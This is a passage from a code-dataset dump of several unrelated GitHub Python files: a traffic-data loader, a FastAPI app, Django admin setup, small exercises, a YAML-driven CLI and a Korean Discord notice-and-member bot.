logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n return logger\n\n\ndef load_dataset(\n dataset_path: str,\n preprocessing_parameters: DataPreprocessing,\n get_time_index: bool = False,\n) -> Union[Tuple[numpy.array, numpy.array], Tuple[numpy.array, numpy.array, Any]]:\n \"\"\"\n Terribly hardcoded loading function to load the traffic dataset. If you\n need to upload other data, by all means forget about this and build a\n function specific to your use case. 
Only requirement is that the output\n is completely ready for feeding straight into the model as properly\n dimensioned numpy arrays.\n\n :param dataset_path: the path where the file is.\n :param get_time_index: whether to include the time index in the output\n or not\n :param preprocessing_parameters: data object with the parameters for each\n specific loading\n :return: the data in the right dimensionality\n \"\"\"\n\n raw_dataset = pandas.read_csv(dataset_path, delimiter=\";\")\n\n # Merge date and hour into a proper datetime\n raw_dataset[\"str_uur\"] = raw_dataset[\"uur\"].astype(str)\n raw_dataset[\"str_uur\"] = raw_dataset[\"str_uur\"].apply(\n lambda hour: hour if len(hour) == 2 else \"0\" + hour\n )\n raw_dataset[\"interval_start_datetime\"] = pandas.to_datetime(\n raw_dataset[\"datum\"] + \" \" + raw_dataset[\"str_uur\"] + \":00:00\",\n format=\"%d/%m/%Y %H:%M:%S\",\n )\n\n # Merge camera name and way into a single ID\n raw_dataset[\"rijrichting\"] = raw_dataset[\"rijrichting\"].astype(str)\n\n raw_dataset[\"camera_id\"] = (\n raw_dataset[\"camera_naam\"] + \" - way \" + raw_dataset[\"rijrichting\"]\n )\n\n # Remove unnecesarry fields\n raw_dataset.drop(\n [\n \"datum\",\n \"str_uur\",\n \"uur\",\n \"camera_naam\",\n \"camera_kijkrichting\",\n \"rijrichting\",\n ],\n axis=1,\n inplace=True,\n )\n\n # Filter only camera ID's we are interested in\n if preprocessing_parameters.camera_method == \"all\":\n camera_selection = defaults.CAMERAS_OF_INTEREST\n elif preprocessing_parameters.camera_method == \"random\":\n camera_selection = random.sample(\n defaults.CAMERAS_OF_INTEREST, k=preprocessing_parameters.camera_count\n )\n elif preprocessing_parameters.camera_method == \"explicit_selection\":\n camera_selection = preprocessing_parameters.camera_selection\n else:\n raise ValueError(\n f\"Camera method {preprocessing_parameters.camera_method} is not a valid method\"\n )\n\n raw_dataset = raw_dataset[raw_dataset[\"camera_id\"].isin(camera_selection)]\n\n # Sort by time\n raw_dataset.sort_values(by=[\"interval_start_datetime\"])\n\n # Pivot cameras as columns\n # Missing values get counted as 0\n raw_dataset = raw_dataset.pivot_table(\n index=\"interval_start_datetime\",\n columns=\"camera_id\",\n values=\"intensiteit\",\n fill_value=0,\n )\n\n # Remove data out of time range\n raw_dataset = raw_dataset.loc[\n (raw_dataset.index > preprocessing_parameters.earliest)\n & (raw_dataset.index < preprocessing_parameters.latest)\n ]\n\n # Include forward and backward hours\n shaped_dataset = hour_grouper(\n raw_dataset,\n preprocessing_parameters.hours_backward,\n preprocessing_parameters.hours_forward,\n )\n\n # Extract time_index\n time_index = shaped_dataset.index\n\n # Build a scaler\n scaler = MinMaxScaler()\n scaler.fit(shaped_dataset.to_numpy())\n\n # Split into train and set\n train_dataset = shaped_dataset[\n shaped_dataset.index < preprocessing_parameters.split_datetime\n ]\n test_dataset = shaped_dataset[\n shaped_dataset.index >= preprocessing_parameters.split_datetime\n ]\n\n # Turn into numpy arrays with right dimensionality\n train_dataset = train_dataset.to_numpy()\n test_dataset = test_dataset.to_numpy()\n\n # Scale\n train_dataset = scaler.transform(train_dataset)\n test_dataset = scaler.transform(test_dataset)\n\n if get_time_index:\n return train_dataset, test_dataset, time_index\n return train_dataset, test_dataset\n\n\ndef hour_grouper(\n data: pandas.DataFrame, steps_backward: int = 1, steps_forward: int = 0\n):\n # Conceptually, going back in time one hour is 
unavoidable. Thus, the first\n # hour back is removed as it is unavoidably happening.\n steps_backward -= 1\n if steps_backward == 0 and steps_forward == 0:\n return data\n\n camera_column_names = data.columns.values\n\n data[\"central_time\"] = data.index\n\n for i in range(1, steps_backward + 1):\n data[f\"backward_{i}\"] = data[\"central_time\"] + pandas.Timedelta(hours=i)\n data = data.merge(\n right=data[[f\"backward_{i}\", *camera_column_names]],\n how=\"left\",\n left_on=\"central_time\",\n right_on=f\"backward_{i}\",\n suffixes=(\"\", f\"_back{i}\"),\n )\n data = data.drop([f\"backward_{i}\", f\"backward_{i}_back{i}\"], axis=1)\n\n for i in range(1, steps_forward + 1):\n data[f\"forward_{i}\"] = data[\"central_time\"] - pandas.Timedelta(hours=i)\n data = data.merge(\n right=data[[f\"forward_{i}\", *camera_column_names]],\n how=\"left\",\n left_on=\"central_time\",\n right_on=f\"forward_{i}\",\n suffixes=(\"\", f\"_forw{i}\"),\n )\n data = data.drop([f\"forward_{i}\", f\"forward_{i}_forw{i}\"], axis=1)\n\n data.index = data[\"central_time\"]\n data = data.drop([\"central_time\"], axis=1)\n\n data = data.dropna(axis=0)\n\n return data\n\n\ndef load_definitions(\n experiment_definitions_path: str,\n sections: Iterable[Union[ModelDefinition, FitParameters, DataPreprocessing]] = (\n ModelDefinition,\n FitParameters,\n DataPreprocessing,\n ),\n) -> List[ExperimentDefinition]:\n \"\"\"\n Reads all the experiment definitions in the path and returns them.\n\n :param experiment_definitions_path: the path where definitions are stored\n as JSON files.\n :param sections: which sections of the definition should be loaded\n :return: a list of experiment definitions\n \"\"\"\n\n definition_files_paths = os.listdir(experiment_definitions_path)\n\n definitions = []\n for definition_file_path in definition_files_paths:\n with open(\n os.path.join(experiment_definitions_path, definition_file_path), \"r\"\n ) as definition_file:\n definition_data = json.load(definition_file)\n\n model_definition = None\n if ModelDefinition in sections:\n model_data = definition_data[\"model\"]\n model_definition = ModelDefinition(\n input_shape=model_data[\"input_shape\"],\n layers=model_data[\"layers\"],\n encoded_size=model_data[\"encoded_size\"],\n activation=model_data[\"activation\"],\n final_activation=model_data[\"final_activation\"],\n loss_function=model_data[\"loss_function\"],\n optimizer=model_data[\"optimizer\"],\n learning_rate=model_data[\"learning_rate\"],\n )\n\n fit_parameters = None\n metrics = None\n if FitParameters in sections:\n fit_parameters_data = definition_data[\"fit_parameters\"]\n fit_parameters = FitParameters(\n batch_size=fit_parameters_data[\"batch_size\"],\n epochs=fit_parameters_data[\"epochs\"],\n )\n metrics = definition_data[\"metrics\"]\n\n data_preprocessing = None\n if DataPreprocessing in sections:\n data_preprocessing_data = definition_data[\"data_preprocessing\"]\n data_preprocessing = DataPreprocessing(\n earliest=data_preprocessing_data[\"earliest\"],\n latest=data_preprocessing_data[\"latest\"],\n split_datetime=data_preprocessing_data[\"split_datetime\"],\n cv_folds=data_preprocessing_data[\"cv_folds\"],\n test_size=data_preprocessing_data[\"test_size\"],\n hours_backward=data_preprocessing_data[\"hours_backward\"],\n hours_forward=data_preprocessing_data[\"hours_forward\"],\n camera_method=data_preprocessing_data[\"camera_method\"],\n camera_count=data_preprocessing_data[\"camera_count\"],\n camera_selection=data_preprocessing_data[\"camera_selection\"],\n )\n\n 
definition = ExperimentDefinition(\n model_definition=model_definition,\n metrics=metrics,\n fit_parameters=fit_parameters,\n data_preprocessing=data_preprocessing,\n )\n\n definitions.append(definition)\n\n return definitions\n","repo_name":"pmartincalvo/traffic-autoencoder","sub_path":"traffic_autoencoder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22909803411","text":"\"\"\"Main module for the FastAPI application.\"\"\"\n\nfrom fastapi import Depends, FastAPI, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Query, Session\n\nfrom src.helpers import get_db\nfrom src.models import Chapter\nfrom src.schemas import ChapterList\n\napp = FastAPI()\n\n# Add the CORS middleware\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndb = Depends(get_db)\n\n\n@app.get(\"/\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def root() -> dict[str, str]:\n \"\"\"\n Root endpoint for the API.\n\n Returns\n -------\n dict: message\n\n Examples\n --------\n >>> root()\n {\"message\": \"Hello World\"}\n\n \"\"\"\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/hello/{name}\", response_model=dict, status_code=status.HTTP_200_OK)\nasync def say_hello(name: str) -> dict[str, str]:\n \"\"\"\n Say hello to the user.\n\n Args:\n name: str\n name to say hello to\n\n Returns:\n dict: message\n\n Examples:\n >>> say_hello(\"John\")\n {\"message\": \"Hello John\"}\n \"\"\"\n return {\"message\": f\"Hello {name}\"}\n\n\n@app.get(\"/healthcheck\", status_code=status.HTTP_200_OK)\ndef healthcheck() -> dict[str, str]:\n \"\"\"\n Healthcheck endpoint for the API.\n\n Returns\n -------\n dict: status\n\n Examples\n --------\n >>> healthcheck()\n {\"status\": \"ok\"}\n \"\"\"\n return {\"status\": \"ok\"}\n\n\n@app.get(\n \"/chapters\",\n response_model=ChapterList,\n status_code=status.HTTP_200_OK,\n responses={\n status.HTTP_404_NOT_FOUND: {\n \"model\": ChapterList,\n \"description\": \"Chapters not found\",\n },\n },\n)\ndef get_chapters(db: Session = db) -> ChapterList:\n \"\"\"\n Get a list of chapters.\n\n Args:\n db: Session\n\n Returns:\n ChapterList: list of chapters\n\n Raises:\n HTTPException: if unable to retrieve chapters from the database\n\n Examples:\n >>> get_chapters()\n \"\"\"\n chapters: Query[type[Chapter]] = db.query(Chapter)\n\n chapters = [chapter.chapter_name for chapter in chapters]\n\n return ChapterList(chapters=chapters)\n","repo_name":"ShivamAmratlalPatel/ticket_app","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22973817340","text":"from django.contrib import admin\nfrom .models import Config, hetong\n# Register your models here.\n\nclass hetongAdmin(admin.ModelAdmin):\n list_filter = ('bkgw','check_status',)\n list_display = ('zkzh','xm','xb','creater','bkgw','bscj','bspm')\n\nadmin.site.register(hetong, hetongAdmin)\n\nclass ConfigAdmin(admin.ModelAdmin):\n list_display = ('title','enable',)\n\nadmin.site.register(Config, 
ConfigAdmin)","repo_name":"xiangnanscu/djtest","sub_path":"jiangan/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36151452086","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 2 14:10:17 2020\r\n\r\n@author: lockd\r\n\r\n ANAGRAMS LOGIC 1: Sum of all the ASCII characters is same for ANAGRAMS\r\nWorks even if the first letter of both the strings is capital.\r\n\r\n\"\"\"\r\n\r\ns1 = input(\"Enter the first string: \")\r\ns2 = input(\"Enter the second string: \")\r\n\r\nsum1 = 0\r\nfor i in s1:\r\n sum1 = sum1 + ord(i) \r\nprint(sum1)\r\n\r\n#With while loop\r\n\"\"\"\r\ni = 0\r\nwhile(i None:\n self.__ap = argparse.ArgumentParser(\n description=\"CLI for the Unstable Situation Generator\", add_help=True)\n for argument in self.ARGUMENTS:\n arg_params = self.ARGUMENTS[argument]\n self.__ap.add_argument(argument, **arg_params)\n \n def launch(self) -> None:\n ui_args = self.__ap.parse_args()\n if not ui_args.s or not ui_args.n:\n if not ui_args.checkpoint_load:\n raise TypeError(\"Must specify at least a checkpoint to load or YAML node and service configurations\")\n else:\n usg = UnstableSituationGenerator.load_checkpoint(ui_args.checkpoint_load)\n else:\n with open(ui_args.s, 'r') as in_services:\n services = yaml.safe_load(in_services)\n with open(ui_args.n, 'r') as in_nodes:\n nodes = yaml.safe_load(in_nodes)\n usg = UnstableSituationGenerator(services, nodes, ui_args.rng_seed)\n usg.generate_situation(ui_args.r, ui_args.o)\n if ui_args.checkpoint_save:\n usg.save_checkpoint(ui_args.checkpoint_save)\n\nif __name__ == '__main__':\n CommandUI().launch()\n","repo_name":"StickBrush/MistIaC","sub_path":"SituationGenerator/usg_ui.py","file_name":"usg_ui.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6130290878","text":"import pickle\r\n\r\nfilepath = 'score.bin'\r\n\r\ndef input_scores():\r\n s = []\r\n i = 1\r\n while True:\r\n n = int(input(f'#{i}? 
'))\r\n \r\n if n < 0:\r\n break\r\n s.append(n)\r\n i += 1\r\n return s\r\n\r\ndef get_average(s):\r\n total = 0\r\n for n in s:\r\n total += n\r\n return total / len(s)\r\n\r\ndef show_scores(s):\r\n for n in s:\r\n print(n, end=' ')\r\n print()\r\n\r\ndef save_data(scores, filepath):\r\n with open(filepath, 'wb') as file:\r\n pickle.dump(scores, file)\r\n\r\ndef load_data(filepath):\r\n with open(filepath, 'rb') as file:\r\n scores = pickle.load(file)\r\n return scores\r\n\r\n# Check if the file exists and load scores if it does\r\ntry:\r\n scores = load_data(filepath)\r\n print(\"[파일읽기]\")\r\n show_scores(scores)\r\n print(\"평균:\", get_average(scores))\r\nexcept FileNotFoundError:\r\n scores = input_scores()\r\n print(\"[점수 입력]\")\r\n save_data(scores, filepath)\r\n\r\nprint(\"[점수 출력]\")\r\nshow_scores(scores)\r\nprint(\"평균:\", get_average(scores))\r\n\r\n \r\n","repo_name":"songhj8304/hw","sub_path":"hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24096270880","text":"import discord\r\nimport asyncio\r\nimport datetime\r\nimport os\r\nimport string\r\nimport random\r\nimport sys\r\nimport time\r\nfrom discord.ext import commands\r\nprefix = \"&\"\r\nbot = commands.Bot(command_prefix=prefix)\r\n\r\nclient = discord.Client()\r\naccess_password = os.environ[\"ACCESS_PASSWORD\"]\r\ndeveloper_id = os.environ[\"DEVELOPER_ID\"]\r\nupdate_is = 0\r\nf = open('update.txt', 'w+t')\r\nf.write(str(update_is))\r\nf.close()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as', client.user)\r\n print('( name =', client.user.name, ', id =', client.user.id, ')')\r\n\r\n activity = discord.Activity(name='Messages | &b help', type=discord.ActivityType.watching)\r\n await client.change_presence(activity=activity)\r\n\r\n\r\n@client.event\r\nasync def on_reaction_add(reaction, user):\r\n a = reaction.message.content.split(\"\\n\")\r\n b = a[0][10:]\r\n c = b.split(\" \")\r\n servername = c[0]\r\n noticeid = c[1]\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(str(user.id) + ',')\r\n f.close()\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n print(s)\r\n memberlist = s[:-1].split(\",\")\r\n f.close()\r\n memberlist = list(set(memberlist))\r\n print(memberlist)\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'w+t')\r\n f.write(\",\".join(memberlist) + \",\")\r\n f.close()\r\n return\r\n\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith('&b'):\r\n f = open('update.txt', 'rt')\r\n update_is = f.read()\r\n f.close()\r\n if int(update_is) == 1 and not('&b finishupdate ' in message.content):\r\n await message.channel.send('업데이트 중인 관계로 명령어를 사용 하실 수 없습니다.')\r\n return\r\n\r\n if message.content == '&b help':\r\n now = datetime.datetime.now()\r\n\r\n #embed1 설정\r\n embed1 = discord.Embed(title=\"소개\", description=\"기획 : Bukgeuk\\n개발 : Bukgeuk\\n테스트 : Bukgeuk\\n버전 : v3.3\\nBukgeukBOT의 저작권은 개발자에게 있습니다.\", color=0xf9dddc)\r\n if now.hour > 12:\r\n embed1.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed1.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 
\" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n\r\n #embed2 설정\r\n text = \"&b help : 도움말\\n&b addmember [서버 이름] [@유저] : 멤버 추가\\n&b viewmember [서버 이름] : 멤버 출력\\n&b notice [서버 이름] [공지 이름] [내용] : 공지 추가\\n&b noticesend [서버 이름] [공지 이름] : 공지 확인 안한 멤버에게 확인 메시지 전송\\n&b noticedelete [서버 이름] [공지 이름] : 공지 삭제\\n&b noticenow [서버 이름] : 진행중인 공지 출력\\n&b resetmember [서버 이름] : 멤버 초기화\\n&b deletemember [서버 이름] [@유저] : 멤버 삭제\\n\"\r\n text += \"&b viewreactionuser [서버 이름] [공지 이름] : 리액션한 유저 출력\\n&b addreactionuser [서버 이름] [공지 이름] [@유저] : 리액션 목록에 멤버 추가\\n&b deletereactionuser [서버 이름] [공지 이름] [@유저] : 리액션 목록에서 멤버 삭제\\n&b resetreactionuser [서버 이름] [공지 이름] : 리액션 목록 초기화\\n\"\r\n text += \"&b dmsend : 개인메시지로 메시지 전송\\n&b random [최소값] [최대값] : 랜덤으로 범위 내의 숫자 출력\\n&b startupdate [#채널] : 봇 업데이트 시작 공지\\n&b finishupdate [#채널] : 봇 업데이트 완료 공지\\n&b shutdown : BukgeukBOT 강제 종료\"\r\n embed2 = discord.Embed(title=\"명령어\", description=text, color=0xf9dddc)\r\n if now.hour > 12:\r\n embed2.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed2.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n\r\n #embed3 설정\r\n embed3 = discord.Embed(title=\"주의사항\", description=\"항목에 공백이 있으면 오류가 발생합니다\\nnotice 명령어를 사용할 때 '[내용]' 항목은 한 줄 내려서 입력해 주세요\\nresetreactionuser 명령어를 사용하시면 공지를 작성한 멤버도 리액션 목록에서 삭제됩니다.\", color=0xf9dddc)\r\n if now.hour > 12:\r\n embed3.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오후 \" + str(now.hour-12) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n else:\r\n embed3.set_footer(text = str(now.year) + \"년 \" + str(now.month) + \"월 \" + str(now.day) + \"일 | \" + \"오전 \" + str(now.hour) + \"시 \" + str(now.minute) + \"분 \" + str(now.second) + \"초\")\r\n #embed 출력\r\n await message.author.send('BukgeukBOT 도움말 입니다.', embed=embed1)\r\n await message.author.send('', embed=embed2)\r\n await message.author.send('', embed=embed3)\r\n await message.channel.send('개인 메시지로 도움말이 전송되었습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content == '&b dmsend':\r\n await message.channel.send('전송할 메시지를 입력해 주세요')\r\n try:\r\n def check(m):\r\n return m.author == message.author and m.channel == message.channel\r\n msg = await client.wait_for('message', check=check, timeout=15.0)\r\n except asyncio.TimeoutError:\r\n await message.channel.send('시간이 초과되었습니다.')\r\n return\r\n else:\r\n await message.author.send(msg.content)\r\n await message.channel.send('개인메시지로 전송되었습니다')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b addmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n after=message.content[13:]\r\n members = after.split(\" \")\r\n servername = members[0]\r\n f = open('memberlist-' + servername + '.txt', 'a+t')\r\n f.close()\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n membertext = f.read()\r\n f.close()\r\n f = open('memberlist-' + servername + '.txt', 'a+t')\r\n if '<@' in members[1]:\r\n nm = members[1][2:-1]\r\n else:\r\n nm = members[1]\r\n if nm in membertext:\r\n await message.channel.send('이미 추가 되어 있는 멤버입니다.')\r\n return\r\n f.write(nm + ',')\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버가 \"' + servername + '\" 서버에 정상적으로 
추가되었습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b viewmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[14:]\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n memberlist = s.split(\",\")\r\n f.close()\r\n members = \"\"\r\n i = 0\r\n for m in memberlist:\r\n if i == len(memberlist) - 1:\r\n break\r\n members += str(client.get_user(int(m))) + '\\n'\r\n i += 1\r\n\r\n await message.channel.send('\"' + servername + '\" 서버의 멤버 목록 입니다.\\n' + '```\\n' + members + '\\n```')\r\n return\r\n else:\r\n await message.channel.send('\"' + servername + '\" 서버의 멤버 파일이 없습니다')\r\n return\r\n\r\n\r\n\r\n\r\n elif message.content.startswith('&b notice '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n after = message.content.split(\"\\n\")\r\n abc = after[0][10:]\r\n last = abc.split(\" \")\r\n servername = last[0]\r\n noticeid = last[1]\r\n file = noticeid + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n await message.channel.send('이미 진행중인 공지입니다.')\r\n else:\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(str(message.author.id) + ',')\r\n f.close()\r\n delmsg = await message.channel.send('\"' + str(noticeid) + '\" 공지가 \"' + servername + '\" 서버에 정상적으로 추가 되었습니다.')\r\n await asyncio.sleep(3)\r\n await delmsg.delete()\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticesend '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[14:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n s = s[:-1]\r\n members = s.split(\",\")\r\n f.close()\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n s = s[:-1]\r\n reactionusers = s.split(\",\")\r\n f.close()\r\n for m in members:\r\n run = 0\r\n for ru in reactionusers:\r\n if run == len(reactionusers) - 1:\r\n if m == ru:\r\n break\r\n else:\r\n await client.get_user(int(m)).send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지를 읽어 주시기 바랍니다.')\r\n await message.channel.send('\"' + str(client.get_user(int(m))) + '\" 님에게 전송을 완료하였습니다.')\r\n break\r\n else:\r\n if m == ru:\r\n break\r\n else:\r\n run = run + 1\r\n\r\n os.remove(str(noticeid) + '-' + servername + '.txt')\r\n await message.channel.send('전송을 완료하였습니다.')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticedelete '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[16:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = noticeid + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('공지 파일 삭제에 성공했습니다!\\n공지는 직접 삭제해 주세요')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b noticenow '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[13:]\r\n path = \"./\"\r\n file_list = os.listdir(path)\r\n notices = \"\"\r\n for x in file_list:\r\n if 'memberlist' 
not in x:\r\n if servername in x:\r\n a = x[:-4]\r\n b = a.split(\"-\")\r\n notices += b[0] + '\\n'\r\n await message.channel.send('\"' + servername + '\" 서버에서 진행중인 공지 입니다.\\n' + '```\\n' + notices + '\\n```')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b resetmember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n servername = message.content[15:]\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('멤버 파일 삭제에 성공했습니다!')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 파일이 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b deletemember '):\r\n if(0 == message.author.guild_permissions.administrator):\r\n await message.channel.send('이런, 권한이 부족하네요...')\r\n return\r\n a = message.content[16:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n tm = b[1]\r\n if '<@' in tm:\r\n nm = tm[2:-1]\r\n else:\r\n nm = tm\r\n\r\n file = 'memberlist-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open('memberlist-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n members = s.split(\",\")\r\n f.close()\r\n try:\r\n members.remove(nm)\r\n f = open('memberlist-' + servername + '.txt', 'wt')\r\n f.write(\",\".join(members))\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버를 삭제했습니다.')\r\n except ValueError:\r\n await message.channel.send('\"' + str(client.get_user(int(nm))) + '\" 멤버가 없습니다.')\r\n return\r\n else:\r\n await message.channel.send('멤버 파일이 없습니다.')\r\n return\r\n\r\n\r\n elif message.content.startswith('&b random '):\r\n a = message.content[10:]\r\n b = a.split(\" \")\r\n min = b[0]\r\n max = b[1]\r\n await message.channel.send('이번에 나온 숫자는 \"' + str(random.randrange(int(min), int(max) + 1)) + '\" 입니다!')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b viewreactionuser '):\r\n a = message.content[20:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n memberlist = s[:-1].split(\",\")\r\n f.close()\r\n memberlist = list(set(memberlist))\r\n members = \"\"\r\n i = 0\r\n for m in memberlist:\r\n if i == len(memberlist):\r\n break\r\n members += str(client.get_user(int(m))) + \"\\n\"\r\n i += 1\r\n\r\n await message.channel.send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 리액션한 유저들 입니다.\\n' + '```\\n' + members + '\\n```')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b addreactionuser '):\r\n a = message.content[19:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n c = b[2]\r\n user = c[2:-1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n users = s[:-1].split(\",\")\r\n for u in users:\r\n if u == user:\r\n await message.channel.send('이미 추가되어 있는 멤버예요!')\r\n return\r\n\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'a+t')\r\n f.write(user + \",\")\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버가 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 성공적으로 추가되었습니다.')\r\n return\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif 
message.content.startswith('&b deletereactionuser '):\r\n a = message.content[22:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n print(servername)\r\n noticeid = b[1]\r\n print(noticeid)\r\n c = b[2]\r\n user = c[2:-1]\r\n print(user)\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n print(file)\r\n if os.path.isfile(file):\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'rt')\r\n s = f.read()\r\n users = s[:-1].split(\",\")\r\n users = list(set(users))\r\n try:\r\n users.remove(user)\r\n except ValueError:\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버는 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지에 추가 되어 있지 않아요!')\r\n return\r\n\r\n f.close()\r\n f = open(str(noticeid) + '-' + servername + '.txt', 'wt')\r\n f.write(\",\".join(users) + \",\")\r\n f.close()\r\n await message.channel.send('\"' + str(client.get_user(int(user))) + '\" 멤버가 \"' + servername + '\" 서버의 \"' + noticeid + '\" 공지의 reactionuser 목록에서 삭제되었습니다.')\r\n return\r\n\r\n else:\r\n await message.channel.send('이런, 일치하는 공지가 없네요...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b resetreactionuser '):\r\n a = message.content[21:]\r\n b = a.split(\" \")\r\n servername = b[0]\r\n noticeid = b[1]\r\n file = str(noticeid) + '-' + servername + '.txt'\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n await message.channel.send('\"' + servername + '\" 서버의 \"' + noticeid + '\" 공지의 reactionuser 파일을 성공적으로 초기화 하였습니다.')\r\n return\r\n else:\r\n await message.channel.send('해당하는 공지의 reactionuser 파일이 없습니다만...')\r\n return\r\n\r\n\r\n\r\n elif message.content.startswith('&b shutdown'):\r\n await 